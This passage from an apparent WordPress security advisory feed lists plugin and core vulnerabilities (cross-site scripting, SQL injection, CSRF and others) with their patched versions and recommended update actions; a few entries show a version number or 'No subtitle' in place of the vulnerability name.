Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.2, 3.8.2

Plugin: Co-Authors Plus

Vulnerability: 3.5.1
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: WP Popups – WordPress Popup builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.5.1
Recommended Action: Update to version 2.1.5.1, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 3.0.2.1
Recommended Action: Update to version 3.0.2.1, or a newer patched version

Plugin: Related Products for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.16
Recommended Action: Update to version 3.3.16, or a newer patched version

Plugin: PWA for WP & AMP

Vulnerability: Missing Authorization
Patched Version: 1.7.33
Recommended Action: Update to version 1.7.33, or a newer patched version

Plugin: Process Steps Template Designer

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Twenty20 Image Before-After

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via process_bulk_action
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Quttera Web Malware Scanner

Vulnerability: Authenticated (Administrator+) Directory Traversal via ShowFile
Patched Version: 3.4.2.1
Recommended Action: Update to version 3.4.2.1, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Arbitrary Content Deletion
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Popular Brand Icons – Simple Icons

Vulnerability: Simple Icons <= 2.7.7
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Don8

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.5.5
Recommended Action: Update to version 8.5.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: SQL Injection
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Super Testimonials

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Directory Traversal
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Injection Guard

Vulnerability: Missing Authorization to Whitelist Update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Original texts Yandex WebMaster

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.3.59
Recommended Action: Update to version 1.3.59, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Abandoned Cart Pro for WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.13.0
Recommended Action: Update to version 7.13.0, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.3.79
Recommended Action: Update to version 1.3.79, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Missing Authorization on AJAX actions
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: WP-RecentComments

Vulnerability: SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.14
Recommended Action: Update to version 1.6.14, or a newer patched version

Plugin: Shop Page WP

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 2.0.29
Recommended Action: Update to version 2.0.29, or a newer patched version

Plugin: WP-Polls

Vulnerability: Cross-Site Scripting
Patched Version: 2.73.1
Recommended Action: Update to version 2.73.1, or a newer patched version

Plugin: Ko-fi Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Regular Expression Denial of Service (ReDoS)
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Event Expresso Free

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.1.37.14
Recommended Action: Update to one of the following versions, or a newer patched version: 3.1.37.14, 3.1.37.14L

Plugin: LiquidPoll – Polls, Surveys, NPS and Feedback Reviews

Vulnerability: Missing Authorization via activate_addon
Patched Version: 3.3.69
Recommended Action: Update to version 3.3.69, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: 1.12.1
Recommended Action: Update to version 1.12.1, or a newer patched version

Plugin: Kopa Framework

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: simple-flash-video

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce GoCardless Gateway

Vulnerability: Unauthenticated Insecure Direct Object Reference
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: wppm

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Export Users to CSV

Vulnerability: CSV Injection
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Live Chat with Facebook Messenger

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Snazzy Maps

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: ReFlex Gallery » WordPress Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Zedity – The Layout-Free Content Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Content Views – Post Grid & Filter, Recent Posts, Category Posts … (Shortcode, Blocks, and Elementor Widgets)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: WP Popups – WordPress Popup builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.4.8
Recommended Action: Update to version 2.1.4.8, or a newer patched version

Plugin: WordPress Knowledge base & Documentation Plugin – WP Knowledgebase

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Download Counter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 2.79
Recommended Action: Update to version 2.79, or a newer patched version

Plugin: WP Popup Banners

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘value’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce

Vulnerability: Authenticated (Contributor+) Arbitrary File Read
Patched Version: 2.0.7
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.7, 4.1.10

Plugin: MainWP iThemes Security Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Task Manager Pro – Task Management Plugin For WordPress

Vulnerability: Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.14
Recommended Action: Update to version 3.3.14, or a newer patched version

Plugin: WP资源下载管理

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Collapse-O-Matic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: No subtitle
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: eShop

Vulnerability: Multiple SQL Injections
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quick Subscribe

Vulnerability: Cross-Site Request Forgery to Arbitrary Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: DELUCKS SEO

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection via get_maps
Patched Version: 2.85.5
Recommended Action: Update to version 2.85.5, or a newer patched version

Plugin: All in One B2B for WooCommerce

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JS Multi Hotel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bulk change of posts terms and post types

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSVP Events

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Project Status

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Code Highlight.js

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mail Masta

Vulnerability: SQL Injection via camp_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Videos on Admin Dashboard

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘email’
Patched Version: 10.6.6
Recommended Action: Update to version 10.6.6, or a newer patched version

Plugin: Variation Images Gallery for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via style
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: No subtitle
Patched Version: 1.22.9
Recommended Action: Update to version 1.22.9, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.0.94
Recommended Action: Update to version 1.0.94, or a newer patched version

Plugin: Taboola

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 20.2
Recommended Action: Update to version 20.2, or a newer patched version

Plugin: Dean’s Permalinks Migration

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: CSV Injection
Patched Version: 7.7.2
Recommended Action: Update to version 7.7.2, or a newer patched version

Plugin: Orange Form

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[enabled_languages]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: MainWP Rocket Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Scripting
Patched Version: 14.13.3
Recommended Action: Update to version 14.13.3, or a newer patched version

Plugin: Daily Prayer Time

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2022.03.01
Recommended Action: Update to version 2022.03.01, or a newer patched version

Plugin: WP Frontend Profile

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Coupon Creator

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.0.06
Recommended Action: Update to version 8.0.06, or a newer patched version

Plugin: Email Address Encoder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.23
Recommended Action: Update to version 1.0.23, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 5.8.6
Recommended Action: Update to version 5.8.6, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Social Share Buttons by Supsystic

Vulnerability: Missing Authorization
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: WP Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 12.2
Recommended Action: Update to version 12.2, or a newer patched version

Plugin: WordPress Amazon S3 Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Church Admin

Vulnerability: Cross-Site Request Forgery leading to Plugin Backup Disclosure
Patched Version: 3.4.135
Recommended Action: Update to version 3.4.135, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Cross-Site Request Forgery via accua_forms_list_page_table
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: SSL Mixed Content Fix

Vulnerability: Cross-Site Request Forgery on handle_installation function
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Live updates from Excel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: SparkPost

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Unauthenticated Password Protected Post Disclosure
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Download Plugins and Themes in ZIP from Dashboard

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WCP OpenWeather

Vulnerability: Reflected Cross-Site Scripting via ‘tab’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Unauthorised Event TimeSlot Update
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated Arbitrary Post Deletion
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: SpeedyCache – Cache, Optimization, Performance

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Localize Remote Images

Vulnerability: Cross-Site Request Forgery via admin menu
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SpeakOut! Email Petitions

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.14.15.1
Recommended Action: Update to version 2.14.15.1, or a newer patched version

Plugin: LabTools

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder

Vulnerability: Open Redirect
Patched Version: 4.0.9.4
Recommended Action: Update to version 4.0.9.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Widget Title
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: Pods – Custom Content Types and Fields

Vulnerability: 2.7.26
Patched Version: 2.7.27
Recommended Action: Update to version 2.7.27, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Missing Authorization to Plugin Installation, Settings Change/Delete, Demo Import, Directory Kit Deletion via wdk_public_action
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Aspose Cloud eBook Generator (Discontinued)

Vulnerability: Directory Traversal
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Easy Media Replace

Vulnerability: Authenticated (Author+) Arbitrary File Deletion
Patched Version: 0.2.0
Recommended Action: Update to version 0.2.0, or a newer patched version

Plugin: Master Addons – Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Reflected Cross-Site Scripting via extension
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.7
Recommended Action: Update to version 3.7.7, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.9.31
Recommended Action: Update to version 2.9.31, or a newer patched version

Plugin: Drag and Drop Multiple File Upload for WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Country Blocking Bypass
Patched Version: 1.2.19
Recommended Action: Update to version 1.2.19, or a newer patched version

Plugin: AGP Font Awesome Collection

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP MLM SOFTWARE PLUGIN

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress File Upload

Vulnerability: Authenticated (Administrator+) Path Traversal
Patched Version: 4.19.2
Recommended Action: Update to version 4.19.2, or a newer patched version

Plugin: Woocommerce Email Report

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Remote Code Execution
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Contact form Form For All – Easy to use, fast, 37 languages.

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GTmetrix for WordPress

Vulnerability: Reflected Cross-Site Scripting via ‘report_id’ and ‘event_id’
Patched Version: 0.4.7
Recommended Action: Update to version 0.4.7, or a newer patched version

Plugin: User Meta – User Profile Builder and User management plugin

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Mass Delete Unused Tags

Vulnerability: Cross-Site Request Forgery via plugin_mass_delete_unused_tags_init
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: List Pages Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Site Offline Or Coming Soon Or Maintenance Mode

Vulnerability: Maintenance Mode Bypass
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Falang multilanguage for WordPress

Vulnerability: Cross-Site Request Forgery via add_language
Patched Version: 1.3.40
Recommended Action: Update to version 1.3.40, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: EZP Maintenance Mode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Share Buttons by Supsystic

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Mediavine Control Panel

Vulnerability: Cross-Site Request Forgery via render_settings_page
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Denial of Service
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Afterpay Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Encrypted Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Discount Rules for WooCommerce – Create Smart WooCommerce Coupons & Discounts, Bulk Discount, BOGO Coupons

Vulnerability: Missing Authorization
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP PHP widget

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Quick Chat

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: demon image annotation

Vulnerability: Improper Input Restriction Validation
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Simplelife

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Royal Elementor Addons and Templates

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Responsive Slider – Image Slider – Slideshow for WordPress

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: idbbee

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Upload Restriction

Vulnerability: Missing Authorization Checks
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: DSGVO All in one for WP

